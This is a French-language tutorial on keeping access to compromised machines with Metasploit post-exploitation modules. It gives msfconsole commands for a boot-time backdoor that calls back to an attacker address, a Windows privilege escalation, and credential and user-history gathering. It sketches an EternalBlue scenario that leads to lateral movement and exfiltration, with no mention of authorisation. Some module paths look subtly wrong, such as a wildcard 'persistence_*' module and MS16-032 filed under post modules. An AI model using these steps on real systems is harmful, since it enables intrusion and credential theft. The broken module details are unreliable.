Comment maintenir l'accès sur un système compromis à l'aide des modules de post-exploitation Metasploit

Introduction

Dans le domaine de la Cybersécurité, maintenir l'accès à un système compromis est une compétence essentielle. Ce tutoriel vous guidera à travers le processus d'utilisation des puissants modules de Post-Exploitation de Metasploit pour établir et maintenir un accès persistant sur un système ciblé. À la fin de cet article, vous aurez une compréhension complète de la manière d'utiliser efficacement ces outils pour améliorer vos compétences en Cybersécurité.

Comprendre la Post-Exploitation Metasploit

Qu'est-ce que la Post-Exploitation Metasploit ?

La Post-Exploitation Metasploit fait référence à l'ensemble d'outils et de techniques au sein du Framework Metasploit utilisés pour maintenir l'accès et le contrôle sur un système compromis. Après l'établissement d'un point d'entrée initial grâce à un exploit réussi, la phase de post-exploitation permet à l'attaquant de recueillir plus d'informations, d'élever les privilèges et de persister sur le système cible.

Concepts clés de la Post-Exploitation

1. Recueil d'informations : Collecte de détails système, comptes utilisateurs, configurations réseau et autres données précieuses de l'hôte compromis.
2. Escalade de privilèges : Obtention de niveaux d'accès et de permissions plus élevés sur le système cible, par exemple, d'un utilisateur standard à un administrateur ou un utilisateur root.
3. Persistance : Garantie de la possibilité pour l'attaquant de maintenir l'accès au système compromis, même après la découverte et la mitigation de l'exploit initial.
4. Mouvement latéral : Élargissement de la portée de l'attaquant en se déplaçant de l'hôte initialement compromis vers d'autres systèmes au sein du même réseau.

Modules de Post-Exploitation Metasploit

Metasploit fournit une large gamme de modules de post-exploitation qui peuvent être utilisés pour atteindre ces objectifs. Certains des modules couramment utilisés incluent :

• post/windows/gather/credentials/* : Modules pour extraire divers types de crédentiels du système Windows compromis.
• post/linux/gather/enum_users_history : Recueille les informations d'historique des utilisateurs d'un système Linux compromis.
• post/multi/manage/shell_to_meterpreter : Met à niveau une session de shell vers une session Meterpreter plus puissante.
• post/windows/manage/persistence_* : Modules pour établir un accès persistant sur le système Windows compromis.

graph TD
    A[Exploitation initiale] --> B[Post-Exploitation]
    B --> C[Recueil d'informations]
    B --> D[Escalade de privilèges]
    B --> E[Persistance]
    B --> F[Mouvement latéral]

Exploitation de modules Metasploit pour maintenir l'accès

Maintien d'un accès persistant

Pour maintenir un accès persistant au système compromis, Metasploit propose divers modules permettant d'établir une connexion fiable et durable. L'un des modules les plus couramment utilisés est le module post/windows/manage/persistence_*, qui permet à l'attaquant de créer une porte dérobée qui s'exécutera automatiquement au démarrage du système.

sequenceDiagram
    participant Attaquant
    participant Cible
    Attaquant->>Cible: Exploitation initiale
    Cible->>Attaquant: Système compromis
    Attaquant->>Cible: Exécution du module de persistance
    Cible->>Attaquant: Accès persistant établi

Exemple de module de persistance

1. Lancez la console Metasploit sur le système Ubuntu 22.04 de l'attaquant :

   msfconsole
   

2. Utilisez le module de persistance :

   use post/windows/manage/persistence_*
   

3. Définissez les options requises, telles que l'adresse IP de l'attaquant (LHOST) et le port d'écoute (LPORT) :

   set LHOST 192.168.1.100
   set LPORT 4444
   

4. Exécutez le module pour établir un accès persistant sur le système cible :

   run
   

Escalade de privilèges

L'obtention de privilèges élevés sur le système compromis est essentielle pour une exploitation et un recueil d'informations plus poussés. Metasploit fournit divers modules pour faciliter l'escalade de privilèges, tels que post/windows/escalate/* et post/linux/escalate/*.

Exemple d'escalade de privilèges (Windows)

1. Utilisez le module post/windows/escalate/ms16_032_secondary_logon_handle_privesc :

   use post/windows/escalate/ms16_032_secondary_logon_handle_privesc
   

2. Définissez les options requises, telles que le numéro de la SESSION :

   set SESSION 1
   

3. Exécutez le module pour tenter l'escalade de privilèges :

   run
   

Recueil d'informations

Les modules de post-exploitation de Metasploit peuvent être utilisés pour recueillir des informations précieuses sur le système compromis, telles que les comptes utilisateurs, les configurations réseau et les processus en cours d'exécution. Ces informations peuvent être utilisées pour étendre davantage l'accès et le contrôle de l'attaquant sur le système cible.

Exemple de recueil d'informations (Linux)

1. Utilisez le module post/linux/gather/enum_users_history :

   use post/linux/gather/enum_users_history
   

2. Définissez les options requises, telles que le numéro de la SESSION :

   set SESSION 1
   

3. Exécutez le module pour recueillir les informations d'historique des utilisateurs :

   run
   

Les informations recueillies grâce à ces modules de post-exploitation peuvent être utilisées pour planifier les prochaines étapes de l'attaque, telles que le mouvement latéral ou l'exfiltration de données.

Application Pratique des Techniques de Post-Exploitation

Scénario : Compromission d'un Système Windows

Dans ce scénario, nous démontrerons l'application pratique des techniques de post-exploitation sur un système Windows compromis.

Exploitation Initiale

1. Établir un point d'entrée initial sur le système cible en utilisant un exploit Metasploit, tel que exploit/windows/smb/ms17_010_eternalblue.
2. Obtenir une session shell ou Meterpreter sur le système compromis.

Maintien d'un Accès Persistant

1. Utiliser le module post/windows/manage/persistence_* pour créer une porte dérobée persistante sur le système cible.
2. Configurer le module de persistance pour exécuter automatiquement le payload au démarrage du système.
3. Vérifier le mécanisme de persistance en redémarrant le système cible et en s'assurant que l'attaquant peut toujours se connecter.

Escalade de Privilèges

1. Évaluer les privilèges actuels de l'utilisateur sur le système compromis.
2. Utiliser le module post/windows/escalate/ms16_032_secondary_logon_handle_privesc pour tenter une escalade de privilèges.
3. Vérifier l'escalade de privilèges réussie en vérifiant le nouveau contexte utilisateur.

Recueil d'Informations

1. Utiliser les modules post/windows/gather/credentials/* pour extraire des informations sensibles, telles que les identifiants d'utilisateur, du système compromis.
2. Recueillir des informations système supplémentaires, telles que les configurations réseau et les processus en cours d'exécution, en utilisant des modules comme post/windows/gather/enum_logged_on_users et post/windows/gather/enum_processes.

graph TD
    A[Exploitation Initiale] --> B[Maintien d'un Accès Persistant]
    B --> C[Escalade de Privilèges]
    C --> D[Recueil d'Informations]
    D --> E[Mouvement Latéral]
    E --> F[Exfiltration de Données]

En appliquant ces techniques de post-exploitation, l'attaquant peut maintenir l'accès, élever les privilèges et recueillir des informations précieuses du système Windows compromis, ouvrant la voie à un mouvement latéral et à une exfiltration de données ultérieurs.

Résumé

Ce tutoriel de cybersécurité a fourni une vue d'ensemble complète de l'utilisation des modules de post-exploitation de Metasploit pour maintenir l'accès sur un système compromis. En comprenant les capacités de ces outils puissants, vous pouvez améliorer vos compétences en cybersécurité et gérer efficacement l'accès aux systèmes ciblés. Que vous soyez un professionnel de la sécurité ou un hacker en herbe, les techniques abordées dans cet article vous permettront d'emporter votre connaissance de la cybersécurité à de nouveaux sommets.